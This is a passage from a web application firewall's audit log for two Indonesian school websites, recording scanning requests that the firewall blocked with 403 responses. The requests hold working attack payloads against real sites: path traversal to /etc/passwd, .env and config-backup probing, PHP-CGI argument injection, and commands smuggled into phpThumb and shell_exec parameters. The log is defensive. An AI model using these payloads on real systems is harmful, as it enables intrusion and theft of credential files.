Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384878002801 1566 (- - -) Stopwatch2: 1747384878002801 1566; combined=450, p1=335, p2=90, p3=0, p4=0, p5=25, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a412925-Z-- --674ac854-A-- [16/May/2025:15:41:18 +0700] aCb6Lte6THFz1hsaJaKRwAAAABg 103.236.140.4 47904 103.236.140.4 8181 --674ac854-B-- GET /download.php?path=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --674ac854-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --674ac854-E-- --674ac854-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384878197115 1689 (- - -) Stopwatch2: 1747384878197115 1689; combined=537, p1=365, p2=147, p3=0, p4=0, p5=25, sr=78, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --674ac854-Z-- --5765686f-A-- [16/May/2025:15:41:18 +0700] aCb6LkE0LfP59mkCzg73dgAAAMI 103.236.140.4 47906 103.236.140.4 8181 --5765686f-B-- GET /download.php?file=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --5765686f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5765686f-E-- --5765686f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384878391694 1680 (- - -) Stopwatch2: 1747384878391694 1680; combined=446, p1=330, p2=91, p3=0, p4=0, p5=25, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5765686f-Z-- --348acc3f-A-- [16/May/2025:15:41:18 +0700] aCb6Lte6THFz1hsaJaKRwQAAAAE 103.236.140.4 47908 103.236.140.4 8181 --348acc3f-B-- GET /download.php?file=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --348acc3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --348acc3f-E-- --348acc3f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384878586069 1544 (- - -) Stopwatch2: 1747384878586069 1544; combined=469, p1=354, p2=90, p3=0, p4=0, p5=25, sr=102, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --348acc3f-Z-- --2de5d72e-A-- [16/May/2025:15:41:18 +0700] aCb6Lte6THFz1hsaJaKRwgAAABY 103.236.140.4 47910 103.236.140.4 8181 --2de5d72e-B-- GET /download_worksheet.php?action=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2de5d72e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2de5d72e-E-- --2de5d72e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_worksheet.php?action=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384878780521 1325 (- - -) Stopwatch2: 1747384878780521 1325; combined=412, p1=309, p2=78, p3=0, p4=0, p5=25, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2de5d72e-Z-- --6457f936-A-- [16/May/2025:15:41:23 +0700] aCb6M9e6THFz1hsaJaKR3QAAAAA 103.236.140.4 47970 103.236.140.4 8181 --6457f936-B-- GET /dev/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6457f936-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6457f936-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384883852737 671 (- - -) Stopwatch2: 1747384883852737 671; combined=257, p1=230, p2=0, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6457f936-Z-- --583cd369-A-- [16/May/2025:15:41:24 +0700] aCb6NNe6THFz1hsaJaKR4gAAAAY 103.236.140.4 47982 103.236.140.4 8181 --583cd369-B-- GET /application/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --583cd369-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --583cd369-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384884673196 711 (- - -) Stopwatch2: 1747384884673196 711; combined=298, p1=266, p2=0, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --583cd369-Z-- --e5324a25-A-- [16/May/2025:15:43:37 +0700] aCb6ude6THFz1hsaJaKUBgAAABE 103.236.140.4 49358 103.236.140.4 8181 --e5324a25-B-- GET /config.inc.php.old HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --e5324a25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5324a25-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385017529381 1893 (- - -) Stopwatch2: 1747385017529381 1893; combined=697, p1=317, p2=348, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5324a25-Z-- --8bee7b72-A-- [16/May/2025:15:43:37 +0700] aCb6ude6THFz1hsaJaKUCAAAAAA 103.236.140.4 49362 103.236.140.4 8181 --8bee7b72-B-- GET /config.inc.php.bak HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --8bee7b72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8bee7b72-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385017919638 1550 (- - -) Stopwatch2: 1747385017919638 1550; combined=645, p1=311, p2=307, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8bee7b72-Z-- --13a41103-A-- [16/May/2025:15:43:39 +0700] aCb6u9e6THFz1hsaJaKUDwAAAAs 103.236.140.4 49376 103.236.140.4 8181 --13a41103-B-- GET /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Content-Length: 42 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --13a41103-C-- --13a41103-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13a41103-E-- --13a41103-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747385019293650 2625 (- - -) Stopwatch2: 1747385019293650 2625; combined=1478, p1=346, p2=1106, p3=0, p4=0, p5=26, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13a41103-Z-- --36e94e27-A-- [16/May/2025:15:43:40 +0700] aCb6vNe6THFz1hsaJaKUEwAAAA0 103.236.140.4 49384 103.236.140.4 8181 --36e94e27-B-- GET /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --36e94e27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36e94e27-E-- --36e94e27-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747385020269758 1595 (- - -) Stopwatch2: 1747385020269758 1595; combined=496, p1=323, p2=136, p3=0, p4=0, p5=37, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36e94e27-Z-- --35166163-A-- [16/May/2025:15:43:41 +0700] aCb6vde6THFz1hsaJaKUGwAAAAY 103.236.140.4 49400 103.236.140.4 8181 --35166163-B-- GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --35166163-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35166163-E-- --35166163-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385021837761 1614 (- - -) Stopwatch2: 1747385021837761 1614; combined=507, p1=337, p2=132, p3=0, p4=0, p5=38, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35166163-Z-- --2bc63e58-A-- [16/May/2025:15:43:42 +0700] aCb6vte6THFz1hsaJaKUHwAAAAs 103.236.140.4 49408 103.236.140.4 8181 --2bc63e58-B-- GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2bc63e58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bc63e58-E-- --2bc63e58-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385022622583 2150 (- - -) Stopwatch2: 1747385022622583 2150; combined=609, p1=417, p2=157, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bc63e58-Z-- --69280870-A-- [16/May/2025:15:43:43 +0700] aCb6v9e6THFz1hsaJaKUIgAAABA 103.236.140.4 49414 103.236.140.4 8181 --69280870-B-- GET /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --69280870-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69280870-E-- --69280870-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385023210470 1416 (- - -) Stopwatch2: 1747385023210470 1416; combined=491, p1=339, p2=124, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69280870-Z-- --c8c61a74-A-- [16/May/2025:15:43:44 +0700] aCb6wNe6THFz1hsaJaKUKgAAAAY 103.236.140.4 49430 103.236.140.4 8181 --c8c61a74-B-- GET /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --c8c61a74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8c61a74-E-- --c8c61a74-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385024778760 1664 (- - -) Stopwatch2: 1747385024778760 1664; combined=512, p1=352, p2=134, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8c61a74-Z-- --59923d25-A-- [16/May/2025:15:43:44 +0700] aCb6wNe6THFz1hsaJaKUKwAAAAM 103.236.140.4 49432 103.236.140.4 8181 --59923d25-B-- GET 